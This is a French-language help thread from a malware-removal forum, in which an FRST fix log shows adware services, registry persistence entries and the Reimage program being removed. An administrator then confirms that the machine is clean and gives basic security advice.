HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 => key removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_CB883AFA019B4C7DB2A0EDE0EE48A17C => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => value removed successfully
C:\Users\Yves\AppData\Local\background_fault => moved successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_D86E271F0C07DE39109C5B55DCDECA36 => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_941A751A450632976DD0BE07C090C392 => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => key removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => key removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{790B50EC-2BBA-11E7-B94C-64006A5CFC23} => value removed successfully
HKLM\Software\Classes\CLSID\{790B50EC-2BBA-11E7-B94C-64006A5CFC23} => key removed successfully
HKLM\System\CurrentControlSet\Services\WinSAPSvc => key removed successfully
WinSAPSvc => service removed successfully
C:\Users\Yves\AppData\Roaming\Njtain => moved successfully
iSafeKrnl => service not found.
iSafeKrnlKit => service not found.
HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => key removed successfully
iSafeKrnlMon => service removed successfully
iSafeKrnlR3 => service not found.
iSafeNetFilter => service not found.
"C:\Windows\System32\Tasks\ReimageUpdater" => not found.
"C:\ProgramData\Reimage Protector" => not found.
"C:\rei" => not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair" => not found.
C:\Program Files\Reimage => moved successfully
"C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk" => not found.
C:\Users\Yves\Downloads\ResetBrowser.exe => moved successfully
C:\Users\Yves\Desktop\adwcleaner_7.0.2.1.exe => moved successfully
C:\Windows\Reimage.ini => moved successfully
C:\Users\Yves\Downloads\ReimageRepair.exe => moved successfully
"C:\Program Files (x86)\Elex-tech" => not found.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 76315958 B
Java, Flash, Steam htmlcache => 13796 B
Windows/system/drivers => 1109947675 B
Edge => 0 B
Chrome => 0 B
Firefox => 112400622 B
Opera => 99114214 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58568987 B
systemprofile32 => 66945893 B
LocalService => 66356 B
NetworkService => 915534 B
Yves => 2132418288 B

RecycleBin => 0 B
EmptyTemp: => 3.4 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 12:12:43 ====

J'attaque le point 2

Corum
Messages : 4
Inscription : 07 sept. 2017 14:03

Re: Beson d'aide infection

Message par Corum » 08 sept. 2017 15:06


Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87572
Inscription : 10 sept. 2005 13:57
Contact :

Re: Beson d'aide infection

Message par Malekal_morte » 08 sept. 2017 17:06

Il reste des problèmes en particulier ?
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Corum
Messages : 4
Inscription : 07 sept. 2017 14:03

Re: Beson d'aide infection

Message par Corum » 08 sept. 2017 18:18

Non a priori c'est tout bon,
Merci de votre précieuse aide.

Comment vous remercier ?

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87572
Inscription : 10 sept. 2005 13:57
Contact :

Re: Beson d'aide infection

Message par Malekal_morte » 09 sept. 2017 12:19

good =)

Tu peux supprimer le dossier C:\FRST =)

Termine par un nettoyage Malwarebytes Anti-Malware (MBAM) version gratuite
Evite les analyses et nettoyages réguliers ZHPCleaner, AdwCleaner, pas utile.


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « VIRUS : Supprimer/Desinfecter (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 17 invités